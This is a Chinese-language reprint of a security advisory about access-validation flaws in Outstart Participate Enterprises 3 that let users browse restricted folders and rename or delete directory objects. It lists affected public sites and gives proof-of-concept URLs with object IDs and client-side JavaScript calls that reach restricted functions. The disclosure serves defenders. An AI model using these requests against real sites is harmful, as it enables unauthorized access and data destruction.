设为首页 友情链接
在线留言 发表文章
加入收藏 广告联系

刺猬首页

| 专案技术 | 网络技术 | 图形图象 | 网络编程 | 网页设计 | 操作系统 | 服务器 | 技术白皮书 | 在线实验室 | 刺猬论坛 |
  | 数据库 | 设计赏析 | 存储频道 | 网络安全 | 私服架设 |  Solaris | 网站评估 | PC维护技巧 | 下载中心 | 博 客 |
专题: | Linux | java | cisco | 防病毒 | 刀片 | SOA | iscsi | ASP.NET | SQL | Oracle |
您现在的位置: IT公社 IT community >> 私服架设 >> 千年私服 >> 教程正文 用户登录 新用户注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
MySQL MaxDB Web Agent多…
NEXTWEB (i)Site多个安全…
Oracle DBMS_METADATA软…
NEXTWEB (i)Site多个安全…
Sun AnswerBook2多个安全…
Microsoft HyperTermina…
Perl DBI模块本地文件破…
多个应用程序fd_set结构…
DataRescue IDA Pro PE引…
Netgear FVS318路由器多…
  PE多个远程访问验证漏洞           
PE多个远程访问验证漏洞
 

受影响系统:
Outstart Inc Participate Enterprises 3
描述:
--------------------------------------------------------------------------------
PE是基于java的集成了虚拟社区,文档库,消息板等功能的程序,可以模仿已有开放源码软件所提供的功能。

PE中存在访问验证错误,可能允许恶意用户重新命名或删除重要的目录对象,这可能导致所有的函数库,论坛和/或特定内容拒绝服务,直到恢复或正确的重新命名目录对象。

受影响的站点包括:

http://www.les-fontaines-community.com/pe/repository/displaynavigator.jsp
http://forums.palmone.com/pe/repository/displaynavigator.jsp
http://tivo.participate.com/pe/index.jsp
http://pluggedin.palmone.com/regac/pluggedin/login.jsp
http://logitech.participate.com/index.html
http://auditorium.audi.com/pe/index.jsp
http://mcgraw.participate.com/pe/index.jsp
http://thomson.participate.com/index.html



<*来源:Altrus (root@honour.ca)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111030905029490&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
-允许攻击者浏览受限的目录树(在本文情况中是操作目录。更改为rootFolder=105就允许浏览文档库)。

http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
-允许攻击者重新命名所选择的对象ID(在本文情况中是操作目录)。

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
-为删除导航器设置对象CSV。

还可以使用以下javascript命令来调用用户本不可使用的函数:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

建议:
--------------------------------------------------------------------------------
厂商补丁:

Outstart Inc
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.outstart.com

频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。

原始作者:佚名 录入时间:2006-11-3
信息来源:不详 投稿信箱:itqoo@126.com
教程录入:admin    责任编辑:admin 
  • 上一个教程:

  • 下一个教程:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    - 关于我们 - 合作伙伴 - 友情链接 - 广告刊登 - 投稿热线 - 在线留言版权声明联系方式 -
    IT公社版权所有 粤ICP备05127012号
    Copyrigh@2005-2006 itqoo.com.Inc All Rights Reserved  推荐分辨率 1024*768
    联系站长:E-Mail:itqoo@126.com     MSN:urchincc@hotmail.com    QQ:点击这里给我发消息
    特别感谢:亿太网络提供空间支持